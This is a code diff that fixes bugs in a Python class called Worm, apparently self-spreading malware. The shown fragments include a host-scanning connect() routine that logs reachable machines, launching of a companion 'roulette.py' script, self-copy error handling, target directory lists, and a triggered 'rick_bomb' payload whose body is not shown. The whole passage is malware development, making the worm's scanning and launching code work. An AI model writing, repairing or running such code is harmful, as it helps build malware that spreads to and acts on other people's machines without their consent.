--- a/Worm v.1
+++ b/Worm v.1
@@ -164,10 +164,10 @@ class Worm:
             logging.warning("exception occurred: cannot copy")
                         
     #Network Identification----- -AR
-    def connect(hostname, port):
+    def connect(self, hostname, port):
         with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
             result = sock.connect_ex((hostname, port))
-        with threader.print_lock:
+        with self.threader.print_lock:
             if result == 0:
                 stderr.write(f"[{perf_counter() - start:.5f}] Found {hostname}\n")
                 logging.warning(f"[{perf_counter() - start:.5f}] Found {hostname}\n")
@@ -199,8 +199,9 @@ class Worm:
             print("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!HIT NUMBER!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
             self.rick_bomb()
     
-    def run_roulette(self):       
-        subprocess.Popen([f"{self.own_path}\\..\\roulette.py", sys.argv[0]], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
+    def run_roulette(self):   
+        os.startfile(f"{self.own_path}\\..\\roulette.py")    
+        # subprocess.Popen([f"{self.own_path}\\..\\roulette.py", sys.argv[0]], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
     
     def start_worm_actions(self):
         print(self.target_dir_list)
